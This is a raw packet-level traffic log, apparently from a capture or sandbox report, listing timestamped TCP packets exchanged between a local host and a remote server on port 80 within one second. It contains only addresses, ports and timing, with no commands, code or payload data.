                                                                                                                Dec 18, 2024 14:18:17.355354071 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.355395079 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.356095076 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.356127024 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.356167078 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.357073069 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.357439995 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.357481956 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.358336926 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.358442068 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.358479023 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.359453917 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.359467983 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.359505892 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.359961987 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.360080957 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.360435009 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.360435963 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.360522032 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.361166000 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.361203909 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.361344099 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.361378908 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.362226963 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.362238884 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.362282991 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.362981081 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.363063097 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.363100052 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.363698006 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.363898039 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.363939047 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.364351034 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.364433050 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.364470959 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.365072012 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.365284920 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.365324020 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.366012096 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.366024017 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.366051912 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.366700888 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.366826057 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.366863012 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.367527008 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.367635012 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.367676973 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.368393898 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.368568897 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.368607998 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.369215012 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.369440079 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.369482040 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.370098114 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.370115042 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.370160103 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.370820045 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.371014118 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.371042967 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.371654034 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.371802092 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.371859074 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.372494936 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.372605085 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.372641087 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.373321056 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.373459101 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.373497009 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.374124050 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.374332905 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.374978065 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.375016928 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.375186920 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.375221014 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.375741005 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.375835896 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.376424074 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.376652002 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.376760960 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.376801968 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.377403021 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.377527952 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.377650023 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.378185987 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.399698019 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.537149906 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.537316084 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.537374973 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.537405968 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.537497044 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.537902117 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.538261890 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.538360119 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.538400888 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.539064884 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.539135933 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.539202929 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.539865971 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.540004969 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.540182114 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.540683985 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.540966034 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.541017056 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.541563034 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.541742086 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.541780949 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.542376041 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.542388916 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.542421103 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.543270111 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.543283939 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.543323040 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.544037104 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.544158936 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.544198036 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.544819117 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.544909954 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.544950962 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.545663118 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.545829058 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.545969009 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.546562910 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.546576023 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.546679020 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.547245026 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.547358036 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.547394991 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.548132896 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.548204899 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.548240900 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.548907995 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.549030066 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.549071074 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.549864054 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.549876928 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.549918890 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.550614119 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.550659895 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.551387072 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.551430941 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.551450014 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.551489115 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.552213907 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.552355051 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.552396059 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.553100109 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.553165913 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.553277016 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.553864002 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.553950071 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.553996086 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.554748058 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.554872036 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.554913044 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.555490971 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.555613041 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.555651903 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.556318998 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.556442976 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.556587934 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.557218075 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.557264090 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.557305098 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.557982922 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.558069944 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.558108091 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.558778048 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.558917999 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.559011936 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.559673071 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.559730053 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.559772968 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.560455084 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.560575008 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.560611963 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.561280012 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.561443090 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.561486959 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.562114000 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.562207937 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.562247038 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.562896013 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.563121080 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.563165903 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.563786030 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.563884020 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.564423084 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.564590931 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.564738035 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.565571070 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.565609932 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.565648079 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.565690041 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.566356897 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.566462040 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.566663980 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.567070961 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.567123890 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.567166090 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.567840099 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.567985058 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.568026066 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.568664074 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.568805933 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.568845987 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.569535017 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.569752932 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.570147038 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.570322037 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.570489883 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.570528984 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.571160078 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.571358919 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.571392059 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.572004080 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.572129965 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.572263956 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.572885036 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.572977066 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.573009968 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.573661089 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.573828936 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.573873997 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.574425936 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.574522018 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.574561119 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.575347900 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.575377941 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.575413942 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.576073885 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.576273918 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.576342106 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.576886892 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.577076912 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.577229977 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.577753067 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.577903032 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.577944040 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.578516006 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.578731060 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.579436064 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.579483986 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.579511881 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.579546928 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.580318928 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.623215914 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.712198973 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.729151964 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.729192972 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.729269981 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.729466915 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.729676008 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.729712009 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.730081081 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.730163097 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.730201960 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.731051922 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.731137037 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.731285095 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.731786966 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.731853008 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.732054949 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.732631922 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.732753992 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.732804060 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.733376026 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.733596087 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.733705997 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.734566927 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.734694004 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.734740973 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.735022068 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.735209942 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.735287905 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.735856056 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.735996962 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.736164093 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.736728907 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.736936092 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.736983061 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.737524986 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.737628937 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.737678051 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.738343954 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.738418102 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.738472939 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.739147902 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.739248037 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.739949942 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.740006924 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.740192890 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.740242004 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.740818024 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.740833998 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.741355896 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.741615057 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.741857052 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.741903067 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.742409945 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.742674112 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.742727995 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.743320942 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.743339062 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.743376970 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.744173050 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.744225025 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.744275093 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.744911909 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.745117903 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.745188951 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.745728016 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.745801926 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.745851040 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.746510029 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.746627092 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.746669054 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:17.747433901 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.747522116 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:17.747562885 CET4980780192.168.2.9185.215.113.16
